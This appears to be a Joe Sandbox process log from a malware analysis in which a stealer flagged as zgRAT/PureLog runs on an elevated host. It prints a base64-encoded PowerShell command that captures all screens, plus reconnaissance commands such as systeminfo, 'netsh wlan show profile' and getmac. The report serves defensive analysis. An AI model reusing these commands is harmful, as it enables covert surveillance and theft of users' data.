                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:63
                                                                                                                                                                              Start time:04:57:37
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:64
                                                                                                                                                                              Start time:04:57:37
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:65
                                                                                                                                                                              Start time:04:57:37
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:66
                                                                                                                                                                              Start time:04:57:37
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:67
                                                                                                                                                                              Start time:04:57:37
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:68
                                                                                                                                                                              Start time:04:57:37
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                              Imagebase:0x7ff750d20000
                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:69
                                                                                                                                                                              Start time:04:57:37
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                                              Imagebase:0x7ff7946c0000
                                                                                                                                                                              File size:110'080 bytes
                                                                                                                                                                              MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:70
                                                                                                                                                                              Start time:04:57:37
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:netsh wlan show profile
                                                                                                                                                                              Imagebase:0x7ff7b2a20000
                                                                                                                                                                              File size:96'768 bytes
                                                                                                                                                                              MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:71
                                                                                                                                                                              Start time:04:57:38
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:75
                                                                                                                                                                              Start time:04:57:38
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline"
                                                                                                                                                                              Imagebase:0x7ff793cf0000
                                                                                                                                                                              File size:2'759'232 bytes
                                                                                                                                                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:76
                                                                                                                                                                              Start time:04:57:38
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:77
                                                                                                                                                                              Start time:04:57:39
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5269.tmp" "c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP"
                                                                                                                                                                              Imagebase:0x7ff65ba90000
                                                                                                                                                                              File size:52'744 bytes
                                                                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:78
                                                                                                                                                                              Start time:04:57:39
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline"
                                                                                                                                                                              Imagebase:0x7ff793cf0000
                                                                                                                                                                              File size:2'759'232 bytes
                                                                                                                                                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:79
                                                                                                                                                                              Start time:04:57:40
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5528.tmp" "c:\Users\user\AppData\Local\Temp\r1ffbxq0\CSCD4520F5E8E664C3288A2F8DB92B7943B.TMP"
                                                                                                                                                                              Imagebase:0x7ff65ba90000
                                                                                                                                                                              File size:52'744 bytes
                                                                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:80
                                                                                                                                                                              Start time:04:57:40
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Users\user\cscript.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Users\user\cscript.exe
                                                                                                                                                                              Imagebase:0x620000
                                                                                                                                                                              File size:3'720'704 bytes
                                                                                                                                                                              MD5 hash:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\cscript.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\cscript.exe, Author: Joe Security
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:81
                                                                                                                                                                              Start time:04:57:41
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Users\user\cscript.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Users\user\cscript.exe
                                                                                                                                                                              Imagebase:0x590000
                                                                                                                                                                              File size:3'720'704 bytes
                                                                                                                                                                              MD5 hash:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:82
                                                                                                                                                                              Start time:04:57:41
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:83
                                                                                                                                                                              Start time:04:57:41
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:85
                                                                                                                                                                              Start time:04:57:41
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                              Imagebase:0x7ff6e1210000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:86
                                                                                                                                                                              Start time:04:57:41
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:88
                                                                                                                                                                              Start time:04:57:41
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                              Imagebase:0x7ff750d20000
                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:112
                                                                                                                                                                              Start time:04:57:42
                                                                                                                                                                              Start date:01/08/2024
                                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Reset < >
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.2689254102.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
